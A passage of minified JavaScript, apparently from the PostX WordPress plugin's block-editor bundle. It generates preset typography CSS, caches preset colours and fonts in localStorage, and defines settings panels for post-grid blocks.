     font-size: var(--postx_preset_heading_h1_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h1_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n            html.colibri-wp-theme body.postx-page h2,\n            body.block-editor-iframe__body h2\n            { \n                font-size: var(--postx_preset_heading_h2_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h2_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n            html.colibri-wp-theme body.postx-page h3,\n            body.block-editor-iframe__body h3\n            { \n                font-size: var(--postx_preset_heading_h3_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h3_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n            html.colibri-wp-theme body.postx-page h4,\n            body.block-editor-iframe__body h4\n            { \n                font-size: var(--postx_preset_heading_h4_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h4_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n            html.colibri-wp-theme body.postx-page h5,\n            body.block-editor-iframe__body h5\n            { \n                font-size: var(--postx_preset_heading_h5_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h5_typo_line_height_lg, normal) !important;\n            }\n            html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6,\n            html.colibri-wp-theme body.postx-page h6,\n            body.block-editor-iframe__body h6\n            { \n                font-size: var(--postx_preset_heading_h6_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_heading_h6_typo_line_height_lg, normal) !important;\n            }\n\n            @media (max-width: ${t.breakpointSm||991}px) {\n                html body.postx-admin-page .editor-styles-wrapper h1 , html body.postx-page h1,\n                html body.postx-admin-page .editor-styles-wrapper h2 , html body.postx-page h2,\n                html body.postx-admin-page .editor-styles-wrapper h3 , html body.postx-page h3,\n                html body.postx-admin-page .editor-styles-wrapper h4 , html body.postx-page h4,\n                html body.postx-admin-page .editor-styles-wrapper h5 , html body.postx-page h5,\n                html body.postx-admin-page .editor-styles-wrapper h6 , html body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_sm, normal);\n                }\n                html.colibri-wp-theme body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_sm, normal);\n                }\n                body.block-editor-iframe__body h1,\n                body.block-editor-iframe__body h2,\n                body.block-editor-iframe__body h3,\n                body.block-editor-iframe__body h4,\n                body.block-editor-iframe__body h5,\n                body.block-editor-iframe__body h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_sm, normal);\n                }\n\n                html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h1,\n                body.block-editor-iframe__body h1\n                {\n                    font-size: var(--postx_preset_heading_h1_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h1_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h2,\n                body.block-editor-iframe__body h2\n                {\n                    font-size: var(--postx_preset_heading_h2_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h2_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h3,\n                body.block-editor-iframe__body h3\n                {\n                    font-size: var(--postx_preset_heading_h3_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h3_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h4,\n                body.block-editor-iframe__body h4\n                {\n                    font-size: var(--postx_preset_heading_h4_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h4_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h5,\n                body.block-editor-iframe__body h5\n                {\n                    font-size: var(--postx_preset_heading_h5_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h5_typo_line_height_sm, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6,\n                html.colibri-wp-theme body.postx-page h6,\n                body.block-editor-iframe__body h6\n                {\n                    font-size: var(--postx_preset_heading_h6_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_heading_h6_typo_line_height_sm, normal) !important;\n                }\n            }\n\n            @media (max-width: ${t.breakpointXs||767}px) {\n                html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n                html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n                html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n                html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n                html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n                html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_xs, normal);\n                }\n                html.colibri-wp-theme body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_xs, normal);\n                }\n                body.block-editor-iframe__body h1,\n                body.block-editor-iframe__body h2,\n                body.block-editor-iframe__body h3,\n                body.block-editor-iframe__body h4,\n                body.block-editor-iframe__body h5,\n                body.block-editor-iframe__body h6\n                {\n                    letter-spacing: var(--postx_preset_Heading_typo_letter_spacing_xs, normal);\n                }\n                html body.postx-admin-page .editor-styles-wrapper h1, html body.postx-page h1,\n                html.colibri-wp-theme body.postx-page h1,\n                body.block-editor-iframe__body h1\n                {\n                    font-size: var(--postx_preset_heading_h1_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h1_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h2, html body.postx-page h2,\n                html.colibri-wp-theme body.postx-page h2,\n                body.block-editor-iframe__body h2\n                {\n                    font-size: var(--postx_preset_heading_h2_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h2_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h3, html body.postx-page h3,\n                html.colibri-wp-theme body.postx-page h3,\n                body.block-editor-iframe__body h3\n                {\n                    font-size: var(--postx_preset_heading_h3_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h3_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h4, html body.postx-page h4,\n                html.colibri-wp-theme body.postx-page h4,\n                body.block-editor-iframe__body h4\n                {\n                    font-size: var(--postx_preset_heading_h4_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h4_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h5, html body.postx-page h5,\n                html.colibri-wp-theme body.postx-page h5,\n                body.block-editor-iframe__body h5\n                {\n                    font-size: var(--postx_preset_heading_h5_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h5_typo_line_height_xs, normal) !important;\n                }\n                html body.postx-admin-page .editor-styles-wrapper h6, html body.postx-page h6,\n                html.colibri-wp-theme body.postx-page h6,\n                body.block-editor-iframe__body h6\n                {\n                    font-size: var(--postx_preset_heading_h6_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_heading_h6_typo_line_height_xs, normal) !important;\n                }\n            }\n            `),t.enablePresetTypoCSS&&(e+=`\n            html body.postx-admin-page .editor-styles-wrapper, html body.postx-page,\n            html body.postx-admin-page .editor-styles-wrapper p, html body.postx-page p,\n            html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n            body.block-editor-iframe__body, body.block-editor-iframe__body p\n            { \n                font-family: var(--postx_preset_Body_and_Others_typo_font_family),var(--postx_preset_Body_and_Others_typo_font_family_type); \n                font-weight: var(--postx_preset_Body_and_Others_typo_font_weight);\n                font-style: var(--postx_preset_Body_and_Others_typo_font_style);\n                text-transform: var(--postx_preset_Body_and_Others_typo_text_transform);\n                text-decoration: var(--postx_preset_Body_and_Others_typo_text_decoration);\n                letter-spacing: var(--postx_preset_Body_and_Others_typo_letter_spacing_lg, normal);\n                font-size: var(--postx_preset_body_typo_font_size_lg, initial);\n                line-height: var(--postx_preset_body_typo_line_height_lg, normal) !important;\n            }\n            @media (max-width: ${t.breakpointSm||991}px) {\n                .postx-admin-page .editor-styles-wrapper, .postx-page,\n                .postx-admin-page .editor-styles-wrapper p, .postx-page p,\n                html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n                body.block-editor-iframe__body, body.block-editor-iframe__body p\n                {\n                    letter-spacing: var(--postx_preset_Body_and_Others_typo_letter_spacing_sm, normal);\n                    font-size: var(--postx_preset_body_typo_font_size_sm, initial);\n                    line-height: var(--postx_preset_body_typo_line_height_sm, normal) !important;\n                }\n            }\n            @media (max-width: ${t.breakpointXs||767}px) {\n                .postx-admin-page .editor-styles-wrapper, .postx-page,\n                .postx-admin-page .editor-styles-wrapper p, .postx-page p,\n                html.colibri-wp-theme body.postx-page, html.colibri-wp-theme body.postx-page p,\n                body.block-editor-iframe__body, body.block-editor-iframe__body p\n                {\n                    letter-spacing: var(--postx_preset_Body_and_Others_typo_letter_spacing_xs, normal);\n                    font-size: var(--postx_preset_body_typo_font_size_xs, initial);\n                    line-height: var(--postx_preset_body_typo_line_height_xs, normal) !important;\n                }\n            }\n            `),e}},n=e=>{const t=i("multipleTypos"),l=[...t.Body_and_Others_typo,...t.Heading_typo].includes(e)?[...t.Body_and_Others_typo].includes(e)?"Body_and_Others_typo":"Heading_typo":e;return e?{openTypography:1,presetTypo:e,family:`var(--postx_preset_${l}_font_family)`,type:`var(--postx_preset_${l}_font_family_type)`,weight:`var(--postx_preset_${l}_font_weight)`,spacing:{lg:`var(--postx_preset_${l}_letter_spacing_lg, normal)`,sm:`var(--postx_preset_${l}_letter_spacing_sm, normal)`,xs:`var(--postx_preset_${l}_letter_spacing_xs, normal)`},decoration:`var(--postx_preset_${l}_text_decoration)`,style:`var(--postx_preset_${l}_font_style)`,transform:`var(--postx_preset_${l}_text_transform)`,size:{lg:`var(--postx_preset_${e}_font_size_lg, initial)`,sm:`var(--postx_preset_${e}_font_size_sm, initial)`,xs:`var(--postx_preset_${e}_font_size_xs, initial)`},height:{lg:`var(--postx_preset_${e}_line_height_lg, normal)`,sm:`var(--postx_preset_${e}_line_height_sm, normal)`,xs:`var(--postx_preset_${e}_line_height_xs, normal)`}}:{openTypography:1}},r=e=>{let t=JSON.parse(localStorage.getItem("ultpPresetTypos"));if(t)return"object"==typeof t?"options"==e?Object.keys(t).filter((e=>"presetTypoCSS"!==e)).map((e=>({value:e,label:e.replace("_typo","").replaceAll("_"," ")}))):Object.keys(t).filter((e=>"presetTypoCSS"!==e)):[];a("get","ultpPresetTypos","",(function(l){if(l.data)return t=l.data,c("ultpPresetTypos",t),"object"==typeof t?"options"==e?Object.keys(t).filter((e=>"presetTypoCSS"!==e)).map((e=>({value:e,label:e.replace("_typo","").replaceAll("_"," ")}))):Object.keys(t).filter((e=>"presetTypoCSS"!==e)):[]}))},s=(e,t)=>{let l=JSON.parse(localStorage.getItem("ultpPresetColors"));if(l)return"colorcode"==e?(t=t?t.replace("var(--postx_preset_","").replace(")",""):"",l[t]):"object"==typeof l?Object.keys(l).filter((e=>"rootCSS"!==e)).map((e=>`var(--postx_preset_${e})`)):[];a("get","ultpPresetColors","",(function(o){if(o.data)return l=o.data,c("ultpPresetColors",l),"colorcode"==e?(t=t?t.replace("var(--postx_preset_","").replace(")",""):"",l[t]):"object"==typeof l?Object.keys(l).filter((e=>"rootCSS"!==e)).map((e=>`var(--postx_preset_${e})`)):[]}))},p=(e,t)=>{let l=JSON.parse(localStorage.getItem("ultpPresetGradients"));if(l)return"colorcode"==e?(t=t?t.replace("var(--postx_preset_","").replace(")",""):"",l[t]):"object"==typeof l?Object.keys(l).filter((e=>"rootCSS"!==e)).map((e=>`var(--postx_preset_${e})`)):[];a("get","presetGradients","",(function(o){if(o.data)return l=o.data,c("ultpPresetGradients",l),"colorcode"==e?(t=t?t.replace("var(--postx_preset_","").replace(")",""):"",l[t]):"object"==typeof l?Object.keys(l).filter((e=>"rootCSS"!==e)).map((e=>`var(--postx_preset_${e})`)):[]}))},c=(e,t)=>{localStorage.setItem(e,JSON.stringify(t))},u=e=>"string"==typeof e&&e.includes("--postx_preset")?"":e,d=(e,t)=>("color"==t&&e?e=e.replace("var(--postx_preset_","").replace("_color)","").replaceAll("_"," "):"typo"==t&&e?e=e.replace("_typo","").replaceAll("_"," "):"gradient"==t&&e&&(e=e.replace("var(--postx_preset_","").replace("_gradient)","").replaceAll("_"," ")),e),m=e=>{const t=n(e);return{fontFamily:t.family,fontSize:t.size.lg,fontWeight:t.weight}},g=e=>{const t="typo"==e?350:0,l=wp.data.select("core/edit-site")?"core/edit-site":"core/edit-post";wp.data&&wp.data.dispatch(l)&&(function(){const e=wp.data.select("core/block-editor").getSelectedBlock();localStorage.setItem("ultp_prev_sel_block",e?.clientId),localStorage.setItem("ultp_settings_save_state","true")}(),wp.data.dispatch(l).openGeneralSidebar("ultp-postx-settings/postx-settings"),document.getElementsByClassName("interface-interface-skeleton__sidebar")[0]?.scrollTo({top:t,behavior:"smooth"}))},y=(e,t={})=>{try{return JSON.parse(e)}catch(e){return t}}},53049:(e,t,l)=>{"use strict";l.d(t,{$U:()=>Re,$i:()=>mt,$m:()=>se,$o:()=>Je,Ar:()=>de,B0:()=>ke,B3:()=>tt,BO:()=>Ae,Bq:()=>Ne,Bv:()=>st,Cz:()=>T,DU:()=>fe,De:()=>it,Df:()=>Y,EG:()=>N,EK:()=>B,Eo:()=>we,G7:()=>G,Gu:()=>gt,HT:()=>k,HU:()=>w,HY:()=>Ye,H_:()=>ze,Hn:()=>Le,I0:()=>H,If:()=>ge,J5:()=>R,JA:()=>W,KE:()=>pe,Ko:()=>dt,Ld:()=>ct,M9:()=>j,MF:()=>p.MF,Mg:()=>Ke,N2:()=>ce,NJ:()=>Ve,Ny:()=>Ee,O2:()=>Oe,Po:()=>D,Qr:()=>pt,RQ:()=>bt,Rd:()=>p.Rd,T:()=>Qe,V2:()=>ee,VH:()=>_e,VI:()=>kt,WD:()=>p.Eo,WJ:()=>p.WJ,Wf:()=>Ce,Wh:()=>me,X_:()=>Me,YA:()=>p.YA,YF:()=>X,YG:()=>x,YZ:()=>Q,Yk:()=>Se,Yp:()=>He,ZJ:()=>Ze,_y:()=>$,aG:()=>ut,ad:()=>A,b0:()=>Ie,cA:()=>ye,cM:()=>O,cr:()=>Pe,dH:()=>ft,dT:()=>p.dT,df:()=>et,do:()=>p.do,e5:()=>U,eC:()=>I,fA:()=>Te,fF:()=>rt,fY:()=>yt,fk:()=>at,fm:()=>De,gA:()=>f,gs:()=>v,hH:()=>F,hd:()=>q,i_:()=>be,ii:()=>Z,iv:()=>$e,jK:()=>V,k0:()=>vt,lA:()=>ve,lj:()=>ot,ng:()=>he,oY:()=>We,oc:()=>Fe,op:()=>L,ov:()=>wt,pI:()=>nt,pj:()=>z,q7:()=>Ue,qM:()=>M,qi:()=>ht,rS:()=>Be,rx:()=>J,sT:()=>lt,sx:()=>p.sx,tf:()=>xe,tj:()=>h,tv:()=>ue,v9:()=>je,wI:()=>Xe,wK:()=>p.wK,wT:()=>Ge,xd:()=>te,yB:()=>qe});var o=l(67294),a=l(13448),i=l(5234),n=l(87763),r=(l(78963),l(83100)),s=l(64766),p=l(87282);const{__}=wp.i18n,{Fragment:c}=wp.element,{addQueryArgs:u}=wp.url,{dateI18n:d}=wp.date,{dispatch:m}=wp.data,{TabPanel:g}=wp.components,y=[],b="https://www.wpxpo.com/postx/?utm_source=db-postx-editor&utm_medium=quick-query&utm_campaign=postx-dashboard#pricing",v=[],h=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/toolbar/typography.svg"}),f=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/toolbar/color.svg"}),k=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/toolbar/spacing.svg"}),w=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/toolbar/setting.svg"}),x=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/toolbar/style.svg"}),T=(0,o.createElement)("img",{src:ultp_data.url+"assets/img/toolbar/meta-text.svg"});let _=0;wp.data.select("core/edit-site")&&(_=(new Date).getTime(),wp.data.select("core")?.getEntityRecords("postType","wp_template",{per_page:-1}),wp.data.select("core")?.getEntityRecords("postType","wp_template_part",{per_page:-1}));let C=[];(()=>{localStorage.setItem("ultpDevice","lg");const e=u("/ultp/common_data",{wpnonce:ultp_data.security});wp.apiFetch({path:e}).then((e=>{localStorage.setItem("ultpTaxonomy",JSON.stringify(e.taxonomy)),localStorage.setItem("ultpGlobal"+ultp_data.blog,JSON.stringify(e.global));const t=JSON.parse(e.image);Object.keys(t).forEach((function(e){v.push({value:e,label:t[e]})}));const l=JSON.parse(e.posttype);Object.keys(l).forEach((e=>{C.push({value:e,label:l[e]})})),Object.keys(l).forEach((function(e){y.push({value:e,label:l[e]})})),ultp_data.archive&&"archive"==ultp_data.archive&&y.unshift({value:"archiveBuilder",label:"Archive Builder",link:b}),y.unshift({value:"customPostType",label:"Multiple Post Type",link:b,pro:!0}),y.unshift({value:"posts",label:"Specific Posts",link:b}),y.unshift({value:"customPosts",label:"Custom Selections",link:b})}))})();const E=[{type:"select",beside:!0,key:"queryType",label:__("Post Type","ultimate-post"),options:y},{type:"select",key:"queryPostType",pro:!0,multiple:!0,options:C,label:__("Choose Post Types","ultimate-post")},...p.$o],S=(e,t,l)=>{let o=l.slice(0);return t&&(o="__all"===t?[]:o.filter((e=>!t.includes(e.key)))),e&&e.forEach((e=>{if("string"==typeof e){const t=l.find((t=>t.key===e));t&&o.push(t)}else e.data&&(o[e.position]?o[e.position].key==e.data.key&&"separator"!==e.data.type||o.splice(e.position,0,e.data):o.push(e.data))})),o},P=(e,t)=>{const{data:l,opType:o}=e;if("keep"===o){const e=[];return t.forEach((t=>{(l.includes(t.key)||"separator"===t.type)&&e.push(t)})),e}return"discard"===o?t.filter((e=>!l.includes(e.key)||"separator"===e.type)):[...t]},L=[...p.ly],I=["taxonomy","maxTaxonomy","catPosition"],B=["catStyle","catTypo","customCatColor","onlyCatColor","cTab","catLineWidth","seperatorLink","catLineSpacing","catRadius","catSacing","catPadding"],U=[...p.Sk],M=["readMoreText","readMoreIcon"],A=["readMoreTypo","readMoreIconSize","rmTab","readMoreSacing","readMorePadding"],H=["arrowSize","arrowWidth","arrowHeight","arrowVartical"],N=["dotSpace","dotVartical","dotHorizontal"],j=[{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-alignleft"}),title:__("Left","ultimate-post"),value:"left"},{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-aligncenter"}),title:__("Center","ultimate-post"),value:"center"},{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-alignright"}),title:__("Right","ultimate-post"),value:"right"}],Z=[...p.Kq],O=["headingText","headingAlign","headingTag","headingStyle","headingBtnText","headingURL","subHeadingShow","subHeadingText"],R=["headingTypo","headingColor","headingBg","headingBg2","headingBorderBottomColor","headingBorderBottomColor2","headingBorder","headingBtnColor","headingBtnHoverColor","headingSpacing","headingPadding","headingRadius","subHeadingTypo","subHeadingColor","subHeadingSpacing","enableWidth","customWidth"],D=[{type:"select",key:"imgCrop",label:__("Image Size","ultimate-post"),options:v},{type:"select",key:"imgCropSmall",label:__("Small Image Size","ultimate-post"),options:v},...p.MS],z=["imgCrop","imgCropSmall","imgAnimation","imgOverlay","imgOverlayType","overlayColor","imgOpacity","imgSrcset","imgLazy"],F=["imgWidth","imgHeight","imageScale","imgTab","imgMargin"],W=["popupIconColor","popupHovColor","popupTitleColor","closeIconColor","closeHovColor"],V=[...p.Oi],G=["metaPosition","metaList","metaListSmall","authorLink","metaDateFormat","cMetaRepetableField","metaAuthorPrefix","metaMinText"],q=["metaStyle","metaSeparator","metaTypo","metaColor","metaHoverColor","metaSeparatorColor","metaBg","metaSpacing","metaBorder","metaMargin","metaPadding"],$=[],K=[...p.kr],J=[...p.Sv],Y=["filterBelowTitle","filterType","filterValue","filterText","filterMobile","filterMobileText"],X=["fliterTypo","fTab","filterRadius","filterDropdownColor","filterDropdownHoverColor","filterDropdownBg","filterDropdownRadius","fliterSpacing","fliterPadding"],Q=[...p.tp],ee=["paginationType","loadMoreText","paginationText","pagiAlign","paginationNav","paginationAjax","navPosition"],te=["pagiTypo","pagiArrowSize","pagiTab","pagiMargin","navMargin","pagiPadding"],le=[{type:"textarea",key:"advanceCss",placeholder:__("Add {{ULTP}} before the selector to wrap element.","ultimate-post")}],oe=[{type:"toggle",key:"hideExtraLarge",label:__("Hide On Extra Large Display","ultimate-post"),pro:!0},{type:"toggle",key:"hideTablet",label:__("Hide On Tablet","ultimate-post"),pro:!0},{type:"toggle",key:"hideMobile",label:__("Hide On Mobile","ultimate-post"),pro:!0}];let ae=[{value:"regular",label:__("Regular (All Taxonomy)","ultimate-post")},{value:"child",label:__("Child Of","ultimate-post")},{value:"parent",label:__("Parent (Only Parent Taxonomy)","ultimate-post")},{value:"custom",label:__("Custom","ultimate-post")}];const ie=[{value:"immediate_child",label:__("Immediate Child (Archive)","ultimate-post")},{value:"current_level",label:__("Current Level (Archive)","ultimate-post")},{value:"allchild",label:__("All Child (Archive)","ultimate-post")}];ae="archive"==ultp_data?.archive?ae.concat(ie):ae;const ne=[{type:"select",key:"taxType",label:__("Query Type","ultimate-post"),options:ae},{type:"select",key:"taxSlug",label:__("Taxonomy Type","ultimate-post"),multiple:!1},{type:"select",key:"taxValue",label:__("Taxonomy Value","ultimate-post"),multiple:!0},{type:"range",key:"queryNumber",min:0,max:200,help:__("Set 0 for get all taxonomy.","ultimate-post"),label:__("Number of Post","ultimate-post")}],re=[...p.Xl],se=[...p.jQ],pe=["advFilterEnable","advPaginationEnable"],ce=["headingShow","filterShow","paginationShow"];function ue(e){return[{isToolbar:!0,data:{type:"tab_toolbar",content:e}}]}const de=e=>(0,o.createElement)(i.Z,{initialOpen:e.initialOpen||!1,title:"inline"==e.title?"":__("Layout","ultimate-post"),block:e.block,store:e.store,col:e.col,data:[e.data]}),me=e=>{const t=S(e.include,e.exclude,Z);let l=null;return e.isTab&&(l={settings:O,style:R}),(0,o.createElement)(i.Z,{isTab:e.isTab,tabData:l,doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Heading","ultimate-post"),store:e.store,data:t,hrIdx:e.hrIdx})},ge=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("General","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.Vv)}),ye=e=>(0,o.createElement)(i.Z,{doc:e.doc,dynamicHelpText:e.dynamicHelpText,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("General","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.f$)});function be(e){return ue([{name:"spacing",title:__("Grid Spacing","ultimate-post"),options:S(e.include,e.exclude,p.yX)}])}const ve=e=>(0,o.createElement)(i.Z,{doc:e.doc,dynamicHelpText:e.dynamicHelpText,youtube:"https://wpxpo.com/docs/postx/postx-features/advanced-query-builder/?utm_source=db-postx-editor&utm_medium=video-docs&utm_campaign=postx-dashboard",initialOpen:e.initialOpen||!1,title:"inline"==e.title?"":__("Query Builder","ultimate-post"),store:e.store,data:S(e.include,e.exclude,E)}),he=e=>{const t=S(e.include,"archive"==ultp_data.archive?["paginationAjax"].concat(e.exclude||[]):e.exclude,Q);let l=null;return e.isTab&&(l={settings:ee,style:te}),(0,o.createElement)(i.Z,{isTab:e.isTab,tabData:l,doc:e.doc,depend:e.depend,youtube:"https://wpxpo.com/docs/postx/postx-features/pagination/?utm_source=db-postx-editor&utm_medium=video-docs&utm_campaign=postx-dashboard",initialOpen:e.initialOpen||!1,title:__("Pagination","ultimate-post"),store:e.store,pro:e.pro,data:t,hrIdx:e.hrIdx})};function fe(e){return ue([{name:"pagi",title:e.title,options:S(e.include,e.exclude,Q)}])}const ke=e=>{const t=S(e.include,e.exclude,J);let l=null;return e.isTab&&(l={settings:Y,style:X}),(0,o.createElement)(i.Z,{isTab:e.isTab,tabData:l,doc:e.doc,depend:e.depend,youtube:"https://wpxpo.com/docs/postx/postx-features/postx-ajax-filtering/?db-postx-editor&utm_medium=video-docs&utm_campaign=postx-dashboard",initialOpen:e.initialOpen||!1,title:__("Filter","ultimate-post"),store:e.store,pro:e.pro,data:t,hrIdx:e.hrIdx})};function we(e){return ue([{name:"filter",title:e.title,options:S(e.include,e.exclude,J)}])}const xe=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Arrow","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.D3)});function Te(e){return ue([{name:"arrow",title:e.title||__("Arrow Style","ultimate-post"),options:S(e.include,e.exclude,p.D3)}])}const _e=e=>{const t=S(e.include,e.exclude,p.pf);let l=null;if(e.isTab){const e=["titleTag","titlePosition","titleLength","titleStyle"];l={settings:e,style:P({opType:"discard",data:e},t).map((e=>e.key))}}return(0,o.createElement)(i.Z,{isTab:e.isTab,tabData:l,doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Title","ultimate-post"),store:e.store,data:t,hrIdx:e.hrIdx})};function Ce(e){return ue([{name:"title",title:e.title||__("Title Style","ultimate-post"),options:S(e.include,e.exclude,p.pf)}])}const Ee=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Prefix","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.MQ),hrIdx:e.hrIdx}),Se=e=>{const t=S(e.include,e.exclude,V);let l=null;return e.isTab&&(l={settings:G,style:q}),(0,o.createElement)(i.Z,{isTab:e.isTab,tabData:l,tabs:[{name:"settings",title:"Settings",icon:n.Z.settings3},{name:"style",title:"Style",icon:n.Z.style}],doc:e.doc,depend:e.depend,youtube:"https://wpxpo.com/docs/postx/postx-features/post-meta/?db-postx-editor&utm_medium=video-docs&utm_campaign=postx-dashboard",initialOpen:e.initialOpen||!1,title:__("Meta","ultimate-post"),store:e.store,pro:e.pro,data:t,hrIdx:e.hrIdx})};function Pe(e){return ue([{name:"meta",title:e.title,options:S(e.include,e.exclude,V)}])}const Le=e=>{const t=S(e.include,e.exclude,D);let l=null;if(e.isTab){const e=["imgCrop","imgCropSmall","imgAnimation","imgOverlay","imgOverlayType","overlayColor","imgOpacity","imgSrcset","imgLazy","fallbackEnable","fallbackImg"];l={settings:e,style:P({opType:"discard",data:e},t).map((e=>e.key))}}return(0,o.createElement)(i.Z,{isTab:e.isTab,tabData:l,doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Image","ultimate-post"),store:e.store,data:t,hrIdx:e.hrIdx})};function Ie({store:e,settingsKeys:t,styleKeys:l,oArgs:i,settingsTitle:n,styleTitle:r,incSettings:s=[],exSettings:p=[],incStyle:u=[],exStyle:d=[]}){const m=P({opType:"keep",data:t},i),g=P({opType:"keep",data:l},i),y=S(s,p,m),b=S(u,d,g);return(0,o.createElement)(c,null,(0,o.createElement)(a.Z,{buttonContent:x,include:ue([{name:"tab_style",title:r,options:b}]),store:e,label:r}),(0,o.createElement)(a.Z,{buttonContent:w,include:ue([{name:"tab_settings",title:n,options:y}]),store:e,label:n}))}const Be=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Video","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.ag),hrIdx:e.hrIdx});function Ue(e){return ue([{name:"video",title:e.title||__("Video Settings","ultimate-post"),options:S(e.include,e.exclude,p.ag)}])}const Me=e=>{const t=S(e.include,e.exclude,K);let l=null;return e.isTab&&(l={settings:["showSmallExcerpt","showSeoMeta","showFullExcerpt","excerptLimit"],style:["excerptTypo","excerptColor","excerptPadding"]}),(0,o.createElement)(i.Z,{isTab:e.isTab,tabData:l,tabs:[{name:"settings",title:"Settings",icon:n.Z.settings3},{name:"style",title:"Style",icon:n.Z.style}],doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:e.title||__("Excerpt","ultimate-post"),store:e.store,data:t,hrIdx:e.hrIdx})};function Ae(e){return ue([{name:"excerpt",title:e.title,options:S(e?.include,e?.exclude,K)}])}const He=e=>(0,o.createElement)(i.Z,{doc:e.doc,depend:e.depend,youtube:e.youtube,initialOpen:e.initialOpen||!1,title:__("Separator","ultimate-post"),store:e.store,data:S(e.include,e.exclude,p.iw)}),Ne=e=>{const t=S(e.include,e.exclude,L);let l=null;return 